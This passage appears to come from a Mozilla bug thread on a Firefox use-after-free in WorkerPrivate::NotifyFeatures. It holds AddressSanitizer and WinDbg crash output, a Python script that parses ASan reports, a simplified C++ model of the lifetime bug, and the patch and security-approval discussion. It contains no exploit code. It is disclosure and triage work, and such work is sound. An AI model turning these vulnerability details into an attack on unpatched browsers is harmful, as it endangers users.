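    #1 0x7f33feac1684 in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) src/dom/workers/WorkerPrivate.cpp:5684

0x608000297d38 is located 24 bytes inside of 88-byte region [0x608000297d20,0x608000297d78)
freed by thread T50 (DOM Worker) here:
    #0 0x471fe1 in __interceptor_free src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7f33f8d8d9cc in nsRunnable::Release() src/xpcom/glue/nsThreadUtils.cpp:35
    #2 0x7f33fb607646 in Release src/obj-firefox/dist/include/mozilla/RefPtr.h:39
    #4 0x7f33fb607646 in ~RefPtr src/obj-firefox/dist/include/mozilla/RefPtr.h:77
    #5 0x7f33fb607646 in ~ConsoleReleaseRunnable src/dom/base/Console.cpp:434
    #16 0x7f33feac1765 in mozilla::dom::workers::WorkerPrivate::NotifyInternal(JSContext*, mozilla::dom::workers::Status) src/dom/workers/WorkerPrivate.cpp:5695

previously allocated by thread T50 (DOM Worker) here:
    #0 0x4721e1 in malloc src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x48b8dd in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7f33fb5c4eba in operator new src/obj-firefox/dist/include/mozilla/mozalloc.h:186
    #3 0x7f33fb5c4eba in mozilla::dom::Console::Method(JSContext*, mozilla::dom::Console::MethodName, nsAString_internal const&, mozilla::dom::Sequence<JS::Value> const&) src/dom/base/Console.cpp:1442
    #4 0x7f33fb5c65c5 in mozilla::dom::Console::Dirxml(JSContext*, mozilla::dom::Sequence<JS::Value> const&) src/dom/base/Console.cpp:1058

Thread T50 (DOM Worker) created by T0 here:
    #0 0x45ea55 in __interceptor_pthread_create src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
"""

HEADER = re.compile(r"^==\d+==ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+)")
ACCESS = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-f]+ thread (T\d+)")
REGION = re.compile(r"is located (\d+) bytes inside of (\d+)-byte region")
FREED = re.compile(r"^freed by thread (T\d+)")
ALLOC = re.compile(r"^previously allocated by thread (T\d+)")
# "#N 0xPC [in function] [file:line | (module+0xoff)]"
FRAME = re.compile(
    r"^\s+#(\d+) 0x[0-9a-f]+(?: in (.+?))?(?: (\S+:\d+|\(\S+\+0x[0-9a-f]+\)))?$")
# Assumption of this example: frames that only move memory or refcounts around.
PLUMBING = re.compile(
    r"^(__interceptor_\w+|malloc|moz_xmalloc|operator new)$|(^|::)(Release|~RefPtr)(\(|$)")


def parse_asan_uaf(report):
    """Split an ASan report into its use / free / alloc stacks plus metadata."""
    info = {"stacks": {"use": [], "free": [], "alloc": []}, "threads": {}}
    current = None  # which stack the following frame lines belong to
    for line in report.splitlines():
        frame = FRAME.match(line)
        if frame:
            if current:  # frames of other sections (thread creation) are ignored
                info["stacks"][current].append(
                    {"n": int(frame.group(1)), "func": frame.group(2), "loc": frame.group(3)})
            continue
        current = None  # any non-frame line ends the current stack
        if m := HEADER.match(line):
            info["kind"], info["address"] = m.groups()
        elif m := ACCESS.match(line):
            info["access"], info["size"] = m.group(1), int(m.group(2))
            info["threads"]["use"], current = m.group(3), "use"
        elif m := REGION.search(line):
            info["offset"], info["region_size"] = int(m.group(1)), int(m.group(2))
        elif m := FREED.match(line):
            info["threads"]["free"], current = m.group(1), "free"
        elif m := ALLOC.match(line):
            info["threads"]["alloc"], current = m.group(1), "alloc"
    return info


def first_meaningful(frames):
    """Innermost frame that is not allocator/refcount plumbing, else frame #0."""
    for f in frames:
        if f["func"] and not PLUMBING.search(f["func"]):
            return f
    return frames[0] if frames else None


def triage(report):
    """Summarise who allocated, who freed and who touched the object afterwards."""
    info = parse_asan_uaf(report)
    if "kind" not in info:
        raise ValueError("not an AddressSanitizer error report")
    summary = {k: first_meaningful(v) for k, v in info["stacks"].items()}
    summary["kind"] = info["kind"]
    summary["access"] = (f'{info.get("access")} of {info.get("size")} bytes at offset '
                         f'{info.get("offset")} of a {info.get("region_size")}-byte object')
    # Use, free and allocation all on one thread means no second thread took part:
    # the object was destroyed and then touched again by the same thread.
    summary["same_thread"] = len(set(info["threads"].values())) == 1
    return summary


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```
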
Summary: Console - Memory corruption in WorkerPrivate::NotifyFeatures() → Console - Use After Free in WorkerPrivate::NotifyFeatures()
Group: core-security → dom-core-security
Attachment #8746309 - Attachment mime type: text/plain → text/html
I couldn't reproduce on today's Mac Nightly build (4/28). Haven't tried ASAN or Linux, though.
Flags: sec-bounty?
Reproduced it with the same test case in today's nightly on Win10:

Firefox version 49.0a1 (2016-04-28)

(7e94.3630): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1056adb0 ebx=22cff2f8 ecx=2041d138 edx=00000001 esi=232aaaf0 edi=232aa800
eip=2268e7a0 esp=22cff2a0 ebp=22cff2f0 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
2268e7a0 30ad1123c095    xor     byte ptr [ebp-6A3FDCEFh],ch ss:002b:b8901601=??
0:076> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SysWOW64\nvwgf2um.dll - 

FAULTING_IP: 
+0
2268e7a0 30ad1123c095    xor     byte ptr [ebp-6A3FDCEFh],ch

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 2268e7a0
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 2268e7a0
Attempt to execute non-executable address 2268e7a0

FAULTING_THREAD:  00003630

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_SEHOP

PROCESS_NAME:  firefox.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  2268e7a0

WRITE_ADDRESS:  2268e7a0 

FOLLOWUP_IP: 
xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+66afa1 [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\workers\workerprivate.cpp @ 5267]
02f715db 8b75fc          mov     esi,dword ptr [ebp-4]

FAILED_INSTRUCTION_ADDRESS: 
+0
2268e7a0 30ad1123c095    xor     byte ptr [ebp-6A3FDCEFh],ch

BUGCHECK_STR:  SOFTWARE_NX_FAULT_SEHOP

NTGLOBALFLAG:  400

APPLICATION_VERIFIER_FLAGS:  0

APP:  firefox.exe

ANALYSIS_VERSION: 10.0.10240.9 x86fre

IP_ON_HEAP:  2268e7a0
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

LAST_CONTROL_TRANSFER:  from 02f715db to 2268e7a0

STACK_TEXT:  
WARNING: Frame IP not in any known module. Following frames may be wrong.
22cff29c 02f715db 00000004 00000004 00000000 0x2268e7a0
22cff2f0 029060a8 232aa800 029060a8 00000000 xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+0x66afa1
22cff378 02906037 1cf8a020 00000004 22cff498 xul!mozilla::dom::workers::WorkerPrivate::NotifyInternal+0x6d
22cff388 029d4c38 13496d80 232aa800 1cf8a020 xul!`anonymous namespace'::NotifyRunnable::WorkerRun+0xf
22cff498 02ad4a9e 1cf8a020 232aaa70 1c2cfe70 xul!mozilla::dom::workers::WorkerRunnable::Run+0x139
22cff4b8 02cf3693 1cf8a180 116b8000 13496d80 xul!mozilla::dom::workers::WorkerPrivate::ProcessAllControlRunnablesLocked+0x4f
22cff54c 02a7cccd 13496d80 00000000 00000000 xul!mozilla::dom::workers::WorkerPrivate::DoRunLoop+0xbf
22cff704 02980c59 1cf8a180 2252c800 22cff701 xul!`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x120
22cff778 0297fdd9 225fedc0 22cff701 22cff793 xul!nsThread::ProcessNextEvent+0x198
22cff794 028eb72d 2252c800 2252c800 0f9ab4d0 xul!NS_ProcessNextEvent+0x16
22cff7b4 028eb621 0052c800 2a16d274 2252c800 xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xc4
22cff7ec 028eb5f0 225fedc0 00000001 0f9ab400 xul!MessageLoop::RunHandler+0x20
22cff80c 028eb8f1 00d0e350 20debac0 20debac0 xul!MessageLoop::Run+0x19
22cff82c 0f9aa739 225fedc0 17f64c18 0f9aa3fb xul!nsThread::ThreadFunc+0xa6
22cff848 0f9aa408 20debac0 22cff890 6e2362a4 nss3!_PR_NativeRunThread+0x9a
22cff854 6e2362a4 20debac0 40e7c43b 6e236250 nss3!pr_root+0xd
22cff890 76b838f4 17f64c18 76b838d0 59507bd5 ucrtbase!_crt_at_quick_exit+0x104
22cff8a4 77b35de3 17f64c18 582fe804 00000000 KERNEL32!BaseThreadInitThunk+0x24
22cff8ec 77b35dae ffffffff 77b5b7e6 00000000 ntdll!__RtlUserThreadStart+0x2f
22cff8fc 00000000 6e236250 17f64c18 00000000 ntdll!_RtlUserThreadStart+0x1b


FAULTING_SOURCE_LINE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\workers\workerprivate.cpp

FAULTING_SOURCE_FILE:  c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\workers\workerprivate.cpp

FAULTING_SOURCE_LINE_NUMBER:  5267

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+66afa1

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: xul

IMAGE_NAME:  xul.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  57220148

STACK_COMMAND:  ~76s ; kb

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_SEHOP_c0000005_xul.dll!mozilla::dom::workers::WorkerPrivate::NotifyFeatures

BUCKET_ID:  SOFTWARE_NX_FAULT_SEHOP_BAD_IP_xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+66afa1

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_SEHOP_BAD_IP_xul!mozilla::dom::workers::WorkerPrivate::NotifyFeatures+66afa1

FAILURE_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_SEHOP

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  xul.dll

FAILURE_FUNCTION_NAME:  mozilla::dom::workers::WorkerPrivate::NotifyFeatures

FAILURE_SYMBOL_NAME:  xul.dll!mozilla::dom::workers::WorkerPrivate::NotifyFeatures

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:software_nx_fault_sehop_c0000005_xul.dll!mozilla::dom::workers::workerprivate::notifyfeatures

FAILURE_ID_HASH:  {aef95975-6804-bb68-4f0d-f5e014881608}

Followup:     MachineOwner
---------
Assignee: nobody → amarchesini
Attached patch crash2.patch
Attachment #8746967 - Flags: review?(bugs)
Whiteboard: btpp-active
Comment on attachment 8746967 [details] [diff] [review]
crash2.patch

Did someone already end up filing the bug to fix features handling in a more generic way?

(it might be a tad nicer to make Cancel call RemoveFeature, but up to you)
Attachment #8746967 - Flags: review?(bugs) → review+
> Did someone already end up filing the bug to fix features handling in a more
> generic way?

Yes, bug 1269154
Comment on attachment 8746967 [details] [diff] [review]
crash2.patch

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

This is just a null pointer used after free. I don't think it can be exploited.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

Not really. It just moves the RemoveFeature() call into another method.

Which older supported branches are affected by this flaw?

m-i and m-a.

If not all supported branches, which bug introduced the flaw?

bug 1263392

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

Probably it's not needed. This patch should apply to m-a.

How likely is this patch to cause regressions; how much testing does it need?

No regressions.
Attachment #8746967 - Flags: sec-approval?
(In reply to Andrea Marchesini (:baku) from comment #8)
> This is just a null pointer used after free. I don't think it can be
> exploited.

Do you mean that the object is destroyed, then immediately a null is stored into it?
I don't see how this is a null pointer crash. Anything related to worker features tends to be UAF.
(In reply to Olli Pettay [:smaug] from comment #10)
> I don't see how this is a null pointer crash. Anything related to worker
> features tends to be UAF.

Sorry, I wrote the comment completely wrongly. I meant that the feature pointer is used after free.
But I still think it's not possible to exploit it. Am I wrong?
(In reply to Andrea Marchesini (:baku) from comment #11)
> (In reply to Olli Pettay [:smaug] from comment #10)
> > I don't see how this is a null pointer crash. Anything related to worker
> > features tends to be UAF.
> 
> Sorry, I wrote the comment completely wrongly. I meant that the feature
> pointer is used after free.
> But I still think it's not possible to exploit it. Am I wrong?

Thanks Andrea for the prompt fix.

I guess what you really mean by "not possible to exploit" is not "this issue is not exploitable" but rather: it's extremely hard to deduce it's a Use After Free with worker feature and reconstruct the test case by merely inspecting the code change of this patch.
We need a security rating before we know if it needs sec-approval (and before we can say how bad this is). Only sec-high and sec-critical bugs need sec-approval.

Is this really a UAF affecting Firefox?
It is:

==7524==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000297d38 at pc 0x7f33feac5f04 bp 0x7f33ba75b870 sp 0x7f33ba75b868
READ of size 8 at 0x608000297d38 thread T50 (DOM Worker)
    #0 0x7f33feac5f03 in mozilla::dom::workers::WorkerPrivate::NotifyFeatures(JSContext*, mozilla::dom::workers::Status) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/workers/WorkerPrivate.cpp:5207
I'll just be conservative and mark it sec-high...
Setting flags since this is trunk and Aurora only. We'll want this nominated for aurora after it goes into trunk. 

sec-approval+
Attachment #8746967 - Flags: sec-approval? → sec-approval+
Comment on attachment 8746967 [details] [diff] [review]
crash2.patch

Approval Request Comment
[Feature/regressing bug #]: bug 1263392
[User impact if declined]: FF could crash.
[Describe test coverage new/current, TreeHerder]: no tests, it's a race condition.
[Risks and why]: No big risks. We are just moving the unregistration of the feature so that Cancel() and Run() both behave correctly.
[String/UUID change made/needed]: none
Attachment #8746967 - Flags: approval-mozilla-aurora?
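The lifetime problem described in the approval request above, as an added, simplified model that is neither the patch nor Gecko code: a worker keeps raw pointers to registered features, and a runnable that owns a feature must unregister it on every exit path. Only the names RemoveFeature, NotifyFeatures, Cancel and Run come from this bug; the classes, the `fixed` switch and the exact shape of the "before" path are assumptions.

```cpp
#include <algorithm>
#include <cstddef>
#include <memory>
#include <vector>

// Hypothetical, simplified model of the pattern; not Gecko code.
struct Feature { int notified = 0; void Notify() { ++notified; } };

class Worker {
  std::vector<Feature*> mFeatures;  // non-owning raw pointers
 public:
  void AddFeature(Feature* f) { mFeatures.push_back(f); }
  void RemoveFeature(Feature* f) {
    mFeatures.erase(std::remove(mFeatures.begin(), mFeatures.end(), f),
                    mFeatures.end());
  }
  std::size_t FeatureCount() const { return mFeatures.size(); }
  void NotifyFeatures() { for (Feature* f : mFeatures) f->Notify(); }
};

class Runnable {  // owns a Feature that it registers with the worker
  Worker& mWorker;
  std::unique_ptr<Feature> mFeature;
  bool mFixed;
  void ReleaseFeature() {  // single exit path: unregister first, then free
    if (!mFeature) return;
    mWorker.RemoveFeature(mFeature.get());
    mFeature.reset();
  }
 public:
  Runnable(Worker& w, bool fixed)
      : mWorker(w), mFeature(new Feature), mFixed(fixed) {
    mWorker.AddFeature(mFeature.get());
  }
  void Run() { ReleaseFeature(); }
  void Cancel() {
    if (mFixed) ReleaseFeature();
    else mFeature.reset();  // before: freed, but the worker still lists it
  }
};

// Registrations the worker still holds once the runnable has finished.
std::size_t StaleEntries(bool fixed, bool cancel) {
  Worker w;
  Runnable r(w, fixed);
  if (cancel) r.Cancel(); else r.Run();
  if (w.FeatureCount() == 0) w.NotifyFeatures();  // only walk a clean list
  return w.FeatureCount();
}

int main() { return StaleEntries(true, true) == 0 ? 0 : 1; }
```

A non-zero result from `StaleEntries(false, true)` is the dangling registration that a later NotifyFeatures() walk would dereference; the model deliberately never performs that walk on a stale list.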
https://hg.mozilla.org/mozilla-central/rev/f769bd4f0bfd
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla49
Flags: sec-bounty? → sec-bounty+
Can you nominate an Aurora patch?
Flags: needinfo?(amarchesini)
Blocks: 1263392
Keywords: regression
Attachment #8746967 - Flags: approval-mozilla-aurora? → approval-mozilla-aurora+
Do I need to do anything here? This patch should apply to m-a. In case, let me know and I can provide a new version of the patch quickly.
Flags: needinfo?(amarchesini)
Group: dom-core-security → core-security-release
Group: core-security-release